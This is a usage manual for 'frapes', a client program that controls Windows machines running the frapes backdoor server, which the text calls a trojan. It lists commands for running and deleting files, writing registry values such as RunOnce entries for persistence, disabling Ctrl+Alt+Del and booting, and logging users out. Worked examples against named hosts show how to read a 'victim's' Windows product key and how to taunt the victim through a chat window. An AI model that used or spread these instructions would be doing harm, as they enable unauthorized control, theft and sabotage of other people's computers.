	frapes - client for frapes backdoor (a Windows windows)

	frapes [Host/IP] [Port]  -  Interactive mode
	frapes [Option]/[Command] [Host/IP]  -  Connectionless mode

	Controll a Windows machine which runs the frapes server (trojan).
	The commands depend on the server version.There are some commands 
	only for the windows client right now. 

	If a command expects a value(like ulr), you must enter the value without
	space between command and value!
	e.g if you want to open open www.netbsd.gr in the victims browser
	the command will be: urlwww.netbsd.gr
		
	hide_taskbar		hides the Windows taskbar
	show_taskbar		shows the hidden taskbar
	version			gets the server version
	open_cd			opens servers first CD-ROM drive
	close_cd		closes servers first opened CD-ROM drive
	disable_ctrl+alt+del	disables CTRL+ALT+DEL function
	enable_ctrl+alt+del	enavles CTRL+ALT+DEL function
	kill			kills the server
	twist_buttons		twists the mousebuttons
	normal_mouse		turns mousebuttons normal
	logout_user		logs out the user who is currently logged
				in
	get_uploadfilename	gets the filename string which will be given
				to an uploaded file
	suf			sets the filename of uploaded file
	get_uploadpath		gets the uploadpath string which will store
				an uploaded file
	sup			sets the uploadpath where uploaded files will
				be uploaded
	oup			opens the upload port (filetransfair port)
	shutdown		shuts down the "infected" machine
	reboot			reboot the machine
	url<value>		opens an url on victims standard browser
	write_registry		writes KEYNAME\Location\ValueName\ValueData
	read_registry		reads ValueData of KEYNAME\Location\ValieName
        skn<value>		sets the KEYNAME e.g(HKEY_LOCAL_MACHINE)
	slo<value>		sets the Location e.g(SOFTWARE\Microsoft)
	svn<value>		sets the ValueName e.g(RunOnce)
	svd<value>		sets the ValueData e.g("C:\WINDOWS\bo2k.exe")
	exe<value>		executes file, enter full path
	prt<value>		changes the listening server port
	del<value>		deletes a file, enter full path
	monitor_off		turns off "victims" monitor
	monitor_on		swichs on the monitor
	uname			guess "victims" OS
	chat			opens an interactive chat on victims machine
				and enables you to chat with him
	close_chat		closes th chat windows
	disables_win_booting	disables "victims" machine to boot
	enables_win_booting	undo a <disables_win_booting>

	Examples:
	Non Interactive Mode:

	There are two options in the Non Interactive Mode:
	
	-C <command>		command you want to execute
	-P <Port>		port which server is listening

	With the Non Interactive Mode you just drop your victim a
	command and disconnect immediately! e.g if you want only
	to open your victims CD-ROM drive and the server is 
	listening to standard port (31145) then the command is
	
	frapes -C open_cd 122.11.31.42

	If the server is listening to an other port e.g (6969)
	then the command will be
	
	frapes -C open_cd -P 6969 122.11.31.42

	An other example, you want to change the listening port 
	to (444) of a4.i-cafe.gr:
	
	frapes -C prt444 a4.i-cafe.gr

	And now you want to logout the user who is currently 
	logged in:

	frapes -C logout_user -P 444 a4.i-cafe.gr


	Interactive Mode:
	
	Connect to a victim whos machine is listening on standard
	port:

	frapes 13.1.8.4

	Now you want to get his Windows ProductKey which is stored
	in the registry! First of all specify the KeyName:

	sknHKEY_LOCAL_MACHINE   

	the server answeres you:
	msg: 13.1.8.4:31145> key name set to (HKEY_LOCAL_MACHINE)

	now you must specify the location:
	sloSOFTWARE\Microsoft\Windows\CurrentVersion
	
	and the ValueName:
	svnProductKey 

	now you must only execute the command

	read_registry

	and the server answers for example:

	msg: 13.1.8.4:31145> RegValue is (VVVVV-WWWWW-XXXXX-YYYYY-ZZZZZ)
	
	if you will save a key on the "vicrims" registry, you must 
	set all keys (KEYNAME,Location,Valuename,ValueData) and then
	enter the command write_registry!

	for example:

	sknHKEY_LOCAL_MACHINE
        sloSOFTWARE\Microsoft\Windows\CurrentVersion
	svnProductKey
	svdLinux
	write_registry

	the servers last answer will be:
        wrote (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductKey -> Linux

	Now if you want to chat with the victim do following:
	Enter the command chat to open a chat window on "victims"
	machine and enter infront of your text "MASTER:"!

	chat
	MASTER: hi dude

	if the victim answeres you will get infront of hist answe a 
	SLAVE:

	e.g:
	SLAVE: who are you?
	MASTER: GOD...
	
	Report any bug to projects@frapes.org

	Author:
	George Dissios gr33k@frapes.org 
	Ioannis Houklis isole@frapes.org
























